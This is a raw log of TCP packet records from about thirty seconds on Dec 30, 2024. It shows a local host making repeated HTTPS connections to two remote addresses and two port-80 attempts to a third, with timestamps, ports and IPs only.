                                                                                                              Dec 30, 2024 11:37:40.712693930 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.712718010 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.713023901 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.713023901 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.713068008 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.713162899 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.713814974 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.713846922 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.714238882 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.714238882 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.714272976 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.768171072 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.768174887 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.768809080 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.768855095 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.768958092 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.770317078 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.770318985 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.770330906 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.770359993 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.770812988 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.771163940 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.771174908 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.096935987 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.096988916 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.097052097 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.097074032 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.097127914 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.097228050 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.097228050 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.097495079 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.098588943 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.098618031 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.322182894 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.322346926 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.322731972 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.322736979 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.322819948 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.322824955 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.380995989 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.381180048 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.381181955 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.381263018 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.381511927 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.381522894 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.381650925 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.381663084 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.381781101 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.381787062 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.383553028 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.383559942 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.695519924 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.695610046 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.695625067 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.695657969 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.695785046 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.695816040 CET44350524142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.695863008 CET50524443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.696393013 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.696443081 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.696530104 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.696647882 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.696665049 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.696863890 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.696877956 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.696882010 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.697348118 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.697355986 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.749912024 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.749972105 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.749983072 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.750139952 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.750262976 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.750313997 CET44350525142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.750354052 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.750401974 CET50525443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.751019955 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.751054049 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.751300097 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.751612902 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:41.751631975 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.799911022 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.799958944 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.799968958 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.799979925 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.799992085 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.800024033 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.800028086 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.800059080 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.800071955 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.800103903 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.801058054 CET50526443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.801069021 CET44350526142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.802257061 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.802284956 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.804498911 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.804694891 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:41.804702997 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.296019077 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.296092033 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.296804905 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.296859026 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.300362110 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.300384045 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.300621986 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.300668955 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.301049948 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.304821014 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.304909945 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.305356026 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.305371046 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.305490971 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.305496931 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.343336105 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.354897976 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.354965925 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.355695009 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.355741978 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.357409954 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.357429028 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.357692957 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.357738018 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.358108997 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.403326035 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.403944969 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.403994083 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.412374973 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.412381887 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.412659883 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.412663937 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.679404020 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.679470062 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.679496050 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.679712057 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.680783033 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.680838108 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.680876970 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.681086063 CET50529443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.681103945 CET44350529142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.681770086 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.681807995 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.682130098 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.682426929 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.682435989 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.717293024 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.717344999 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.717366934 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.717392921 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.717401028 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.717426062 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.717430115 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.717459917 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.717502117 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.718471050 CET50528443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.718486071 CET44350528142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.719794035 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.719844103 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.719918013 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.719944000 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.720082045 CET44350530142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.720154047 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.720154047 CET50530443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.720431089 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.720431089 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.720463991 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.720475912 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.720823050 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.721110106 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.721110106 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:42.721127033 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.723859072 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.723870039 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.863415956 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.863527060 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.863583088 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.863600016 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.863699913 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.863707066 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.863742113 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.863756895 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.863830090 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.870903015 CET50531443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.870925903 CET44350531142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.871857882 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.871887922 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:42.874130011 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.874376059 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:42.874387980 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.301580906 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.301729918 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.302361965 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.303816080 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.305731058 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.305741072 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.305968046 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.306384087 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.306384087 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.320471048 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.320554018 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.321245909 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.322390079 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.322527885 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.323065042 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.323065042 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.323074102 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.324434996 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.324441910 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.324673891 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.324681044 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.324683905 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.324804068 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.328457117 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.347325087 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.371325016 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.487570047 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.488509893 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.491640091 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.491655111 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.491822004 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.491832018 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.681943893 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.682127953 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.682140112 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.682279110 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.682497025 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.682533979 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.682710886 CET44350534142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.682749987 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.682749987 CET50534443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.683104992 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.683147907 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.683422089 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.683624983 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.683634996 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.694453001 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.694510937 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.694520950 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.694586039 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.694686890 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.694714069 CET44350536142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.694761992 CET50536443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.695210934 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.695256948 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.695405960 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.695576906 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:43.695590973 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.733885050 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.734023094 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.734178066 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.734193087 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.734249115 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.734256029 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.734302044 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.734328032 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.734436035 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.734944105 CET50535443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.734966040 CET44350535142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.735518932 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.735562086 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.735610962 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.735820055 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.735830069 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.909739017 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.909780979 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.909826994 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.909862041 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.909914017 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.909969091 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.909969091 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.909969091 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.910866976 CET50537443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.910897017 CET44350537142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.913635015 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.913676977 CET44350541142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:43.915016890 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.915514946 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:43.915524960 CET44350541142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.279864073 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.280122995 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.280622959 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.280755043 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.300148010 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.300173044 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.300487995 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.300589085 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.301357985 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.303668976 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.303749084 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.304450989 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.304519892 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.306575060 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.306602001 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.306783915 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:37:44.306879044 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.307056904 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.307354927 CET50539443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.336549997 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.336642027 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.337069035 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.337080002 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.337393999 CET50540443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.337399960 CET44350540142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.343329906 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.351339102 CET44350539142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.514595032 CET44350541142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.514707088 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.515607119 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.515615940 CET44350541142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.515763044 CET50541443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:44.515769005 CET44350541142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.611676931 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:37:44.647960901 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.648058891 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.648396015 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.648467064 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.648520947 CET44350538142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:44.648616076 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.651983023 CET50538443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:44.652014971 CET44350538142.250.186.142192.168.2.4
